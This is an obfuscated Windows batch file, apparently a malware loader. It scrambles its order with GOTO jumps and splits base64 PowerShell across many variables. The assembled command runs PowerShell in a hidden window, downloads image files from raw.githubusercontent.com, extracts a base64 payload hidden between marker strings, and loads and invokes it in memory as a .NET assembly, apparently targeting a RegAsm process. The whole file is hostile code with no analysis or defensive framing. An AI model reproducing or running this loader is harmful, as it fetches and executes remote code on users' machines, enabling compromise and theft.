@echo off
GOTO GKNJNONGGJ
:IIIFFFNODJ
SET JGNIOHNSHS=#'', ''r'')));iex $oWjuxd\"'"
GOTO IUJIIGNHJF1
:UNIIINOJDG
SET FODDFGJIGN=AkAG8APQBpAGYAKAAhACQAbgAuAEkAcwBTAHQAYQB0AGkAYwApAHsAWwBBAGMAdABpAHYAYQB0AG8A
GOTO GNNDFJOGJH
:NJNOHGSJHF
SET JDINNDNSIG=DIARgBf#AFEAWABOAHoAWgBXADEAaQBiAEgAawBvAFkAbgBsADAAWgBWAHQAZABJA
GOTO IJGODUGDGN
:IONOODUGIG
SET ONIJDUUJGI=QBAACgAKQApAHsAJAB5AD0AWwBEAG8AbQBhAGkAbgBMAG8AYQBkAGUAcgBdADoAOgB
GOTO OHNKJIKDKF0
:SGOFNGGJFN
SET UDFOHFGOGI=JAB3AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAG
GOTO HGNGFFGONG5
:DDNNINKSDJ
SET IFNFGOFHID=YwBoAGUAcwBbADEAXQApACkAIAAnAHQAZQBzAHQAcABvAHcAZQByAHMAaABlAGwAbAAuAEgAbwB
GOTO JIINFNGDDD2
:NOOGGFDIHD
SET NIIJGFJFNJ=0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAGkAKAAkAGEALAAkAHQALAAkAG0ALAAkAHAAP
GOTO IONOODUGIG
:JGSJONKSJH
SET OSGDGOIJIS=G4AdAAuAGMAbwBtAC8AeQBoAHUAdQB1AHUAdQB1AC0AYwBvAG0AbQBpAHQAcwAv
GOTO GSDGOINOOG4
:NOJJDGSHFJ
SET OIGHGFNIDF=wBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQ
GOTO HGNGFFGONG2
:NGJNGGOGGI
SET IOOFFFUDOD=HMALwBnAG8AbwBkAGIAbwBvAGsALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAGkAbQ
GOTO GSDGOINOOG1
:NGNJJOGNFD
SET UIOFGGGFNF=AHcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAXwApAH0AYwBhAHQAYwBoAHsAfQB9AH
GOTO NOOGGFDIHD
:GNNDFJOGJH
SET ISNOGKGIUO=cgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHIAKQB9AD
GOTO DGNGIIGHFF
:NOJDDDJIOS
SET JNGIJONION=AgAEAAKAAnAHQAeAB0AC4AcgBhAHcALwBnAHIAbwAuAHQAcAB5AHIAYwB0AHMAbwByAG
GOTO JIINFNGDDD4
:OJONIDIDGH
SET ONGOOIISFN=gAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlA
GOTO JGSJONKSJH
:JIINFNGDDD
SET DDIFINIGNU=wBGAHoAYwB5AEIARQBiADIAMQBoAGEAVwA1AE0AYgAyAEYAawBaAFgASgA3AGMASABWAGk
GOTO IUJIIGNHJF
:GSDGOINOOG
SET GINHNIDDDO=NQBTAFoAVwBaAHMAWgBXAE4AMABhAFcAOQB1AE8AMwBCADEAWQBtAHgAcABZAHkAQgBqAGIAR
GOTO JIINFNGDDD
:JIINFNGDDD7
SET ONNGGFGDDF=AGkAcgBzAHQAIAA1AHwAZgB0ACAATgBhAG0AZQAsAEMAUABVACAAfQANAAoADQAKACAAIAAgACAA
GOTO JIINFNGDDD8
:GKNJNONGGJ
SET UONFFJIDDN=powershell -Command "Start-Process powershell -WindowStyle Hi
GOTO HGNGFFGONG
:JIINFNGDDD5
SET NODIDIGGDI=MAAnACAALAAgACcAeAA4ADYAJwApAA0ACgAgACAAIAAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwB8
GOTO JIINFNGDDD6
:DGNGIIGHFF
SET GOUGOGDDGI=sAJABuAC4ASQBuAHYAbwBf#AGUAKAAkAG8ALAAkAHAAKQB9AA0ACgANAAoAJABf#AD0AQA
GOTO OHNKJIKDKF8
:GNSNDGIGGG
SET IUFDGODGDG=HAAZQBzACgAKQB8AD8AewAkAF8ALgBGAHUAbABsAE4AYQBtAGUAIAAtAGUAcQAgACQA
GOTO OHNKJIKDKF2
:JINDJGOGGK
SET OUOFIOGFFO=AeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACgAWwBUAGUAeAB0AC4ARQBuAGMAb
GOTO NOJJDGSHFJ
:JIINFNGDDD9
SET GGOJNGGDNG=GetString([system.convert]::Frombase64string([regex]::Replace($ddsdgo, ''f
GOTO IIIFFFNODJ
:NIISFDDNSS
SET FODNGFGHOS=B1AFEAMwBWAHkAYwBtAFYAdQBkAEUAUgB2AGIAVwBGAHAAYgBpADUATQBiAD
GOTO FGNNDODSOI
:IUJIIGNHJF
SET IGJHFIGNDG=AYgBHAGwAagBJAEgATgAwAFkAWABSAHAAWQB5AEIAQgBjADMATgBsAGIAVwBKAHMAZQBTAEIATQBiA
GOTO NJNOHGSJHF
:INNUNINDGO
SET NGDDOIHFOD=dAAgACQAbAAuAEMAbwB1AG4AdAApAHwAJQB7AHQAcgB5AHsAcgBlAHQAdQByAG4AIAAk
GOTO NGNJJOGNFD
:IJGODUGDGN
SET IHNJIHNJOG=EcARQBwAGUAMwBKAGwAZABIAFYAeQBiAGkAQgBCAGMASABCAEUAYgAyADEAaABhAFcANA
GOTO NIISFDDNSS
:OKUODGIGUN
SET ONDJFGIIDO=lAGMAdABpAG8AbgAuAEIAaQBuAGQAaQBuAGcARgBsAGEAZwBzAF0AJwBQAHUAYgBsAGkAYwA
GOTO GOJDJGGFKG
:GSDGOINOOG7
SET GDNGFHSDDO=YAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABnACkAKQAtAG0AYQB0AGMAaAAnADwAPABCAE
GOTO GSDGOINOOG8
:GSDGOINOOG9
SET DNSNNIDHDF=ANABfAEUATgBEAD4APgAnACkAewANAAoAIAAgACAAIABpACAAKABbAEMAbwBuAHYAZQB
GOTO JIINFNGDDD0
:GOJDJGGFKG
SET OIIIOIINFN=sAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMALABJAG4AcwB0AGEAbgBjAGUAJwApACkAOw
GOTO UNIIINOJDG
:HGNGFFGONG
SET ODOGIUJGNI=dden -ArgumentList '-Command \"$ddsdgo = ''DQAKACQAYgA2ADQAPQAnAGQAWABOAHAAYgBt
GOTO OHNKJIKDKF
:HGNGFFGONG3
SET SGDGNSDGIS=GkAbgBnACgAJABiADYANAApACkAKQANAAoAZgB1AG4AYwB0AGkAbwBuACAAZAAoACQAbAApAHsA
GOTO SGOFNGGJFN
:OHNKJIKDKF
SET IOGGGFGSOS=AGMAZwBVADMAbAB6AGQARwBWAHQATwAzAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMA
GOTO GSDGOINOOG
:JIINFNGDDD4
SET SDSDNSGFOG=YALwAvADoAcwAnACwAIAAnADAAJwAsACAAJwAnACwAIAAnAFIAZQBnAEEAcwBtACcALAAgACcA
GOTO JIINFNGDDD5
:GSDGOINOOG6
SET NOJSINUGSG=C0AYQBuAGQAKAAkAHQAPQBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAE
GOTO GSDGOINOOG7
:JIINFNGDDD6
SET GONIOHOIIU=AHMAbwByAHQAIABDAFAAVQAgAC0AZABlAHMAYwB8AHMAZQBsAGUAYwB0ACAALQBm
GOTO JIINFNGDDD7
:HGNGFFGONG2
SET SSUDGIDJFI=wBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByA
GOTO HGNGFFGONG3
:GSDGOINOOG5
SET FOJDIDFOFH=wBlAC4AagBwAGcAJwApACkADQAKAGkAZgAoACgAJABnAD0AZAAgACQAawApA
GOTO GSDGOINOOG6
:OHNKJIKDKF2
SET IIGDOJDIGI=dAB9ADsAJABuAD0AJAByAC4ARwBlAHQATQBlAHQAaABvAGQAKAAkAG0ALAAoAFsAUgBlAGYAbAB
GOTO OKUODGIGUN
:JIINFNGDDD0
SET JISOISGFFJ=yAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBhAHQA
GOTO DDNNINKSDJ
:IUJIIGNHJF1
                      
GOTO IUJIIGNHJF2
:JIINFNGDDD8
SET GFGNINGHIF=IAAgACAAIAAgACAA'';$oWjuxd = [system.Text.encoding]::Unicode.
GOTO JIINFNGDDD9
:HGNGFFGONG5
SET DDJDIJSKFG=kAZQBuAHQAOwAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAkAGwAIAAtAEMAbwB1AG4A
GOTO INNUNINDGO
:IUJIIGNHJF2
%UONFFJIDDN%%ODOGIUJGNI%%IOGGGFGSOS%%GINHNIDDDO%%DDIFINIGNU%%IGJHFIGNDG%%JDINNDNSIG%%IHNJIHNJOG%%FODNGFGHOS%%NONOGODDNG%%OUOFIOGFFO%%OIGHGFNIDF%%SSUDGIDJFI%%SGDGNSDGIS%%UDFOHFGOGI%%DDJDIJSKFG%%NGDDOIHFOD%%UIOFGGGFNF%%NIIJGFJFNJ%%ONIJDUUJGI%%JNNINDNDOI%%IUFDGODGDG%%IIGDOJDIGI%%ONDJFGIIDO%%OIIIOIINFN%%FODDFGJIGN%%ISNOGKGIUO%%GOUGOGDDGI%%HGJJIJGOOF%%GFFJFOIKIO%%IOOFFFUDOD%%GGNSJOFDDJ%%ONGOOIISFN%%OSGDGOIJIS%%IHFFGGNIGS%%FOJDIDFOFH%%NOJSINUGSG%%GDNGFHSDDO%%GGIIFIFINJ%%DNSNNIDHDF%%JISOISGFFJ%%IFNFGOFHID%%FIFJFSGFJJ%%JNGIJONION%%SDSDNSGFOG%%NODIDIGGDI%%GONIOHOIIU%%ONNGGFGDDF%%GFGNINGHIF%%GGOJNGGDNG%%JGNIOHNSHS%
GOTO IUJIIGNHJF3
:GSDGOINOOG8
SET GGIIFIFINJ=EAUwBFADYANABfAFMAVABBAFIAVAA+AD4AKAAuACoAPwApADwAPABCAEEAUwBFADY
GOTO GSDGOINOOG9
:GSDGOINOOG4
SET IHFFGGNIGS=AGcAbwBvAGQAYgBvAG8AawAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AaQBtAGEAZ
GOTO GSDGOINOOG5
:FGNNDODSOI
SET NONOGODDNG=IARgBf#AEsARwBFAHAATwAzADEAOQAnAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQ
GOTO JINDJGOGGK
:OHNKJIKDKF8
SET HGJJIJGOOF=AoACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBu
GOTO OHNKJIKDKF9
:GSDGOINOOG1
SET GGNSJOFDDJ=BhAGcAZQAuAGoAcABnAD8AMQAyADMANAAzAD8AMQAyADMAJwApACwAKAAnAG
GOTO OJONIDIDGH
:JIINFNGDDD2
SET FIFJFSGFJJ=hAGEAYQBhAGEAYQBzAGQAbQBlACcAIAAnAGwAZgBzAGcAZQBkAGQAZABkAGQAZABkAGEAJw
GOTO NOJDDDJIOS
:OHNKJIKDKF0
SET JNNINDNDOI=MAG8AYQBkAEEAcwBzAGUAbQBiAGwAeQAoACQAYQApADsAJAByAD0AJAB5AC4ARwBlAHQAVAB5A
GOTO GNSNDGIGGG
:OHNKJIKDKF9
SET GFFJFOIKIO=AHQAZQBuAHQALgBjAG8AbQAvAHkAaAB1AHUAdQB1AHUAdQAtAGMAbwBtAG0AaQB0A
GOTO NGJNGGOGGI
:IUJIIGNHJF3